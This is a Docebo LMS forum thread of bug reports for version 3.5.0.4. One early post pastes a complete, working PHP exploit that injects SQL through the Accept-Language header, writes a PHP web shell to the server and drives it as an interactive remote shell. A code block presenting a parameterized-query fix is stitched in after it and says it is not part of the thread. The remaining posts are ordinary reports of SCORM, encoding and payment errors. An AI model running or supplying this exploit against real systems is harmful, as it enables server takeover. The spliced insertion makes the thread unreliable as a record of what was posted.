Erba Claudio

Total post : 2688
Written on : 22/03/2008 10:56 ( more than one month )
Object : Docebo 3.5.0.4 Bugs
Please report here bugs ONLY related to docebo 3.5.0.4
Message modified by : claudio.erba on : 22/04/2010 13:03
Docebo CEO and Founder
www.docebo.com
 
unixborges

Total post : 1
Written on : 22/03/2008 21:57 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
I haven't tested it yet, but it would be good to check this here.

<?

/*
-------------------------------------------------------------------
Docebo <= 3.5.0.3 (lib.regset.php) Remote Command Execution Exploit
-------------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.docebo.com/community/
details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER[] array)

[-] autoDetectRegion() function vulnerable to SQL injection in /doceboCore/lib/lib.regset.php

781. function autoDetectRegion() {
782.
783. if(!isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) {
784. $res=0;
785. return $res;
786. }
787. $accept_language=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
788. // [TODO] move the code that makes the accept language array to lib.utils
789.
790. $al_arr=explode(",", $accept_language);
791.
792. $i=0;
793. $res="";
794. while(($res == "") && ($i < count($al_arr))) {
795.
796. $bl_arr=explode(";", $al_arr[$i]);
797. $browser_language=$bl_arr[0];
798.
799. $qtxt="SELECT region_id FROM ".$this->_getListTable()." WHERE browsercode LIKE '%".$browser_language."%'"; <==
800. $q=$this->_executeQuery($qtxt);
801.
802. if (($q) && (mysql_num_rows($q) > 0)) {
803. $row=mysql_fetch_array($q);
804. $res=$row["region_id"];
805. }

an attacker could inject SQL code through the HTTP Accept-Language header (in the query at line 799), but the explode() function at
line 790 will split the injected code by comma (","), so even a blind SQL injection with the BENCHMARK() method isn't possible...
this poc will try to inject some PHP code into the docebo web directory with an INTO DUMPFILE statement; this requires the FILE privilege!

[-] Path disclosure at:

/doceboCore/class/class.conf_fw.php
/doceboCore/class.module/class.event_manager.php
/doceboCore/lib/lib.domxml5.php
/doceboCore/menu/menu_over.php
/doceboCms/class/class.conf_cms.php
/doceboCms/lib/lib.compose.php
/doceboCms/modules/chat/teleskill.php
/doceboCms/class/class.admin_menu_cms.php
*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1);
fclose($sock);
return $resp;
}

function get_path()
{
global $host, $path;

$packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";

preg_match("/in <b>(.*)<\/b> on/i", http_send($host, $packet), $found);
$ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo")));
$ret.= substr($path, 1);

return $ret;
}

print "\n+------------------------------------------------------------+";
print "\n| Docebo <= 3.5.0.3 Remote Command Execution Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if ($argc < 3)
{
print "\nUsage....: php $argv[0] host path\n";
print "\nhost.....: target server (ip/hostname)";
print "\npath.....: path to docebo directory\n";
print "\nExample..: php $argv[0] localhost /doceboCms/";
print "\nExample..: php $argv[0] localhost /docebo/doceboLms/\n";
die();
}

$host = $argv[1];
$path = $argv[2];

$r_path = str_replace("\\", "/", get_path()); // replace "\" for windows path
$r_file = md5(time()).".php";

print "\n[-] Path disclosure: {$r_path}\n\n[-] Trying to inject php shell...\n";

$code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>";
$packet = "GET {$path} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Accept-Language: %'/**/AND/**/1=0/**/UNION/**/SELECT/**/'{$code}'/**/INTO/**/DUMPFILE/**/'{$r_path}{$r_file}'/*\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

$packet = "GET {$path}{$r_file} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);

if (!ereg("_code_", $html)) die("\n[-] Exploit failed...\n");
else print "[-] Shell injected! Starting it...\n";

define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nxpl0it-sh3ll > ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}{$r_file} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: ".base64_encode($cmd)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!ereg("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n".$shell[1];
}
else break;
}

?>

# milw0rm.com [2008-01-09]
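
The fix pattern for the `autoDetectRegion()` query quoted in the post above, as an added example that is not part of the thread, not EgiX's code and not Docebo's actual 3.5.0.4 change: each Accept-Language item is checked against a language-tag allow-list and then passed as a bound parameter. The table name `core_region`, the function names and the in-memory SQLite database are assumptions made so the sketch runs stand-alone.

```php
<?php
// Added illustration: not Docebo's code and not the 3.5.0.4 fix.
// Assumptions: PDO with the sqlite driver is available; the table name
// "core_region" is hypothetical; column names follow the quoted excerpt.

// Return the syntactically valid language tags from an Accept-Language
// header, in the order sent. Anything else (quotes, spaces, "%") is dropped.
function parseAcceptLanguage(string $header, int $maxTags = 10): array
{
    $tags = [];
    foreach (explode(',', $header) as $item) {
        // Strip the optional ";q=0.8" weight, as the quoted code does.
        $tag = trim(explode(';', $item)[0]);
        // Allow-list: letters, then optional "-" separated subtags.
        if (preg_match('/\A[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*\z/', $tag) === 1) {
            $tags[] = strtolower($tag);
        }
        if (count($tags) >= $maxTags) {
            break; // bound the number of queries one request can trigger
        }
    }
    return $tags;
}

function autoDetectRegionSafe(PDO $db, ?string $header): int
{
    if ($header === null) {
        return 0;
    }
    // Bound parameter: header text never becomes part of the SQL string.
    $stmt = $db->prepare(
        'SELECT region_id FROM core_region WHERE browsercode LIKE ? LIMIT 1'
    );
    foreach (parseAcceptLanguage($header) as $tag) {
        // The allow-list above excludes the LIKE wildcards "%" and "_".
        $stmt->execute(['%' . $tag . '%']);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        if ($row !== false) {
            return (int) $row['region_id'];
        }
    }
    return 0;
}

// Constructed sample data (in-memory SQLite stands in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE core_region (region_id INTEGER, browsercode TEXT)');
$db->exec("INSERT INTO core_region VALUES (1, 'en-us;en-gb'), (2, 'pt-br;pt')");

// Constructed headers: an ordinary one, and one whose first item carries
// quote characters and is discarded before any query runs.
var_dump(autoDetectRegionSafe($db, 'pt-BR,pt;q=0.9,en;q=0.8'));
var_dump(autoDetectRegionSafe($db, "en' OR '1'='1;q=1,en"));
```

Either control alone closes the hole in the quoted query; applying both also keeps malformed header items from reaching the database at all.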
 
Erba Claudio

Total post : 2688
Written on : 23/03/2008 22:45 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
This is not a 3.5.0.4 bug; this is fixed in this release
Claudio
Docebo CEO and Founder
www.docebo.com
 
Omid

Total post : 343
Written on : 26/03/2008 21:25 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Hi
I have found three issues regarding language:
1- The CSV that could be grabbed from the report module in the admin area has a problem
with the Farsi language (and maybe any other UTF-8 supported language) and doesn't show
characters correctly.

2- The PDF certificate created via Docebo has a problem with the Farsi language.

3- The tiny chat module related to those users that are online in one course
could transfer only Latin (English) characters and it has a problem with
the Farsi language or maybe any other UTF-8 supported language.
 
Svenningsen Kevin

Total post : 17
Written on : 28/03/2008 13:22 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs

Hi,

I still experience problems with the Scorm-player although upgrading to version 3.5.0.4

The problem also existed earlier ( please see thread "3.5.03 SCORM Player Error" at http://www.docebo.com/community/doceboCms/forum/9_1/message/idThread_3651/3_5_03_SCORM_Player_Error.html )

When I have created a module in CourseLab and imported it in Docebo, whenever I start the module or go to the next step in the module, a javascript alert box appears with the message "Fatal error", and afterwards a new window opens with the following error message:

"Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 375"

I have tried to open the module using the newest Firefox, but a javascript alert box also appears here with the message "TypeError: w has no properties", and again a new window opens with the following error message:

"Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419"

Has this something to do with the use of CourseLab? (I hope not, since all the modules are ready for use and have been made in CourseLab). Or  is there still a bug in the Scorm-player in Docebo?

(I can upload one of the CourseLab modules, if you want to see it...)

Hope somebody can help with some answers since I'm running close to a deadline.

Sincerely,

Kevin

 
Omid

Total post : 343
Written on : 30/03/2008 00:36 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
1. After the message submit action, IE doesn't load any content related to the address below:
http://www.mysite.com/doceboLMS/index.php?modname=message&op=writemessage
2. There is no link tag in the _LOST_PWD_MAILTEXT translation key! Please provide it here,
I really need it.
 
Svenningsen Kevin

Total post : 17
Written on : 02/04/2008 21:31 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs

Hi again,

Just some more details about the error I experience:
 
The first time a module is opened, a javascript error message box opens with the message “[object Error]” and nothing else.
At the same time a new window opens with an error in line 419: “Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419”
Afterwards when I go through the e-learning module a window opens with this message: “Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 400”
And each time I click through a page in the module the javascript error message box with the message “[object Error]” shows up.
 
As far as I can tell, the lines 400 and 419 are the same (in soaplms.php), which means it is the same error. And if the javascript error messages are related to these two lines, it should just be one error, that needs to be corrected?! Although I do not know which error that is….
 
Sincerely,
 
Kevin

 

Written by: Svenningsen Kevin

Hi,

I still experience problems with the Scorm-player although upgrading to version 3.5.0.4

The problem also existed earlier ( please see thread "3.5.03 SCORM Player Error" at http://www.docebo.com/community/doceboCms/forum/9_1/message/idThread_3651/3_5_03_SCORM_Player_Error.html )

When I have created a module in CourseLab and imported it in Docebo, whenever I start the module or go to the next step in the module, a javascript alert box appears with the message "Fatal error", and afterwards a new window opens with the following error message:

"Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 375"

I have tried to open the module using the newest Firefox, but a javascript alert box also appears here with the message "TypeError: w has no properties", and again a new window opens with the following error message:

"Fatal error: Call to a member function on a non-object in D:\www1\SOMAsoftware\extras\e-learning\doceboLms\modules\scorm\soaplms.php on line 419"

Has this something to do with the use of CourseLab? (I hope not, since all the modules are ready for use and have been made in CourseLab). Or  is there still a bug in the Scorm-player in Docebo?

(I can upload one of the CourseLab modules, if you want to see it...)

Hope somebody can help with some answers since I'm running close to a deadline.

Sincerely,

Kevin

 
Omid

Total post : 343
Written on : 03/04/2008 18:10 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Hi
I couldn't delete any user from the Admin Area; after confirming I receive this error:

Fatal error: Call to a member function after_unserialize() on a non-object in /home/user/public_html/docebo/doceboCore/lib/lib.usernotifier.php on line 50
-----------------------------------------------------------------------------------------------------------------------
I found that I have this problem only with my native language; I had this problem in previous versions too.
Is there any solution for it?
Message modified by : omid020 on : 03/04/2008 18:17
 
Jellab Hicham

Total post : 1
Written on : 28/05/2008 16:37 ( more than one month )
Object : Paypal Not Working
Hello,

I tried to test the Ecommerce module with Paypal but I can't complete the checkout with the Paypal interface for final payment.
I have configured the Ecommerce in the Admin area, checked that the right Paypal account address (email) was inserted in Mysql ...etc.
I logged in as a user, added a course to my shopping cart, gone until the last screen (Confirm buy) but then the system won't redirect me to Paypal website. Any hint or help on this ?

Thank you
 
Koster Matthew

Total post : 5
Written on : 06/08/2008 15:27 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Many bugs on my end:

1. First name and Last name are mixed in the display... In the First name I have Matthew, Last name I have Koster, yet everywhere it displays Koster Matthew, and not the right way of Matthew Koster

2. My Area, when scrolling down (in FireFox, have not tested in I.E.) you cannot get to the menu, it disappears before you get to it.

3. When viewing my courses, clicking on Course Material, gets you nothing, but when browsing the list... here is why
http://www.firewebuniversity.com/doceboLms/index.php?modname=coursecatalogue&op=donwloadmaterials&id_course=1 <-- Correct Link
http://www.firewebuniversity.com/doceboLms/index.php?modname=course&op=donwloadmaterials&id_course=1 <--- Bad link

4. Quizzes, I cannot see the questions in a quiz, it simply asks me to submit.

As far as I can tell, that's all the problems I can find so far.
Message modified by : lostnode on : 06/08/2008 16:28
 
Omid

Total post : 343
Written on : 06/08/2008 20:02 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Written by: Koster Matthew

Many bugs on my end:

1. First name and Last name are mixed in the display... In the First name I have Matthew, Last name I have Koster, yet everywhere it displays Koster Matthew, and not the right way of Matthew Koster

2. My Area, when scrolling down (in FireFox, have not tested in I.E.) you cannot get to the menu, it disappears before you get to it.

3. When viewing my courses, clicking on Course Material, gets you nothing, but when browsing the list... here is why
http://www.firewebuniversity.com/doceboLms/index.php?modname=coursecatalogue&op=donwloadmaterials&id_course=1 <-- Correct Link
http://www.firewebuniversity.com/doceboLms/index.php?modname=course&op=donwloadmaterials&id_course=1 <--- Bad link

4. Quizzes, I cannot see the questions in a quiz, it simply asks me to submit.

As far as I can tell, that's all the problems I can find so far.

The first one is a standard in Docebo LMS and that isn't a bug.
I tested it in Firefox but there is no problem!
The third item is not clear to me :(
For the fourth item, as far as I know the "test module" has no problem; could you please
place a screenshot in the related forum category and describe it more?
Regards
 
Koster Matthew

Total post : 5
Written on : 07/08/2008 20:54 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
I will do one better, I will post a video (linked for one of my sites) as screen captures just won't do for the roll over problem... here is another bug..

I set it up again and someone mistyped my password, so I went to get it sent to me, and no links appear, just the following, word for word with no links...

"This is the process to generate a new password for user associated to this email. Click on the link below to generate a new password.rnrnWARNING: The new password will be sent to you by email after clicking on this link.rnThen you can use new password to login."
 
Koster Matthew

Total post : 5
Written on : 07/08/2008 22:04 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
http://www.matthewkoster.com/problem/ <-- There is the video of the problem I have.

Also, is there a way to embed video... I tried via making a web page but it doesn't work.
 
Koster Matthew

Total post : 5
Written on : 08/08/2008 01:15 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
More issues.

What do you mean by Advance, if you are selling the course? It's a field under the cost... Whatever it is I get results when I have a value in it, but Paypal still doesn't work, watch this video as well

http://www.matthewkoster.com/problem/prob2.html

It explains a few of the problems in more detail.
 
Tiberiu Vaduvoiu

Total post : 20
Written on : 16/09/2008 10:41 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
1 bug noticed in the creation of the course.

I created a course X of type classroom. In the "special option" I set Minimum number of subscription = 1 and Maximum number of subscription = 10.
I logged in as a user/student, I go to Course Catalog and I wanted to subscribe to course X. I see a subscription blocked button and when I click on the button I get the message "imp course full". So the max nr is 10, there is no person subscribed and students cannot subscribe to the course because it says "course full".

If I change Maximum number of subscription = 0 (unlimited), then subscription works. But if I put any number, it doesn't work anymore.

Also, if I put minim = 0, maxim = 2, students can subscribe but then the maximum doesn't work, meaning more than 2 students were able to subscribe.
 
Tiberiu Vaduvoiu

Total post : 20
Written on : 26/09/2008 10:09 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
If a course has the Course Completion option checked to "Automatic after completing the end course LO", the student should see "you have finished the course" after he completes all learning objects. Only this doesn't happen. I completed a course that had that option checked, course progress was all filled, 100%, but in my Courses area, I could still see "you are attending this course" instead of "you have finished this course".
 
Santinelli Valerio

Total post : 4
Written on : 01/10/2008 16:59 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Fresh installation. When creating a new category:

Error on _addFolder: INSERT into learning_category( idCategory, idParent, path, lev) VALUES (NULL,'0','/root/Prova','1') Field 'description' doesn't have a default value
 
Santinelli Valerio

Total post : 4
Written on : 01/10/2008 17:38 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
When creating a new user from the user administration interface I get the following error:

INSERT INTO core_setting_user ( path_name, id_user, value ) VALUES ( 'ui.template', '', 'standard' ) with error: Out of range value adjusted for column 'id_user' at row 1

and no user is created in the core_user table as well
 
Santinelli Valerio

Total post : 4
Written on : 01/10/2008 17:38 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
When logging off I get the following warning:

Warning: Missing argument 12 for Form::getLinePassword(), called in C:\lavori\cvs\docebo\doceboCore\lib\lib.usermanager.php on line 1058 and defined in C:\lavori\cvs\docebo\doceboCore\lib\lib.form.php on line 382

Notice: Undefined variable: value in C:\lavori\cvs\docebo\doceboCore\lib\lib.form.php on line 386
 
Erba Claudio

Total post : 2688
Written on : 01/10/2008 21:03 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Did you configure your server alone?
Seems a really badly configured server, also with notice enabled and/or file missing
Claudio 
Message modified by : claudio.erba on : 01/10/2008 21:04
Docebo CEO and Founder
www.docebo.com
 
Santinelli Valerio

Total post : 4
Written on : 02/10/2008 12:42 ( more than one month )
Object : Re: Docebo 3.5.0.4 Bugs
Hi Claudio,
warnings and notices are enabled on purpose. The point is that either there are some problems with the way tables get created or with the user interfaces that do not show some fields that are instead considered mandatory. (For example the description field of a course category).

The server is a standard Apache 2.0.59 with PHP 5.1.4 running on Windows. This is not a first time installation. I use this configuration for day to day development and Docebo is the only software giving such problems so it's either not compatible with those versions (btw MySQL is v5.0.18) or there are still some bugs.

Installation of Docebo went smooth actually. There were no errors or warnings so I suppose that there isn't any file missing. I might be wrong of course, but still I doubt that a wrong query is due to a missing file :)

Is there any way to have the application dump information to a log file or write some more debug info on the pages in order to actually understand what's going wrong without having to debug the code?
 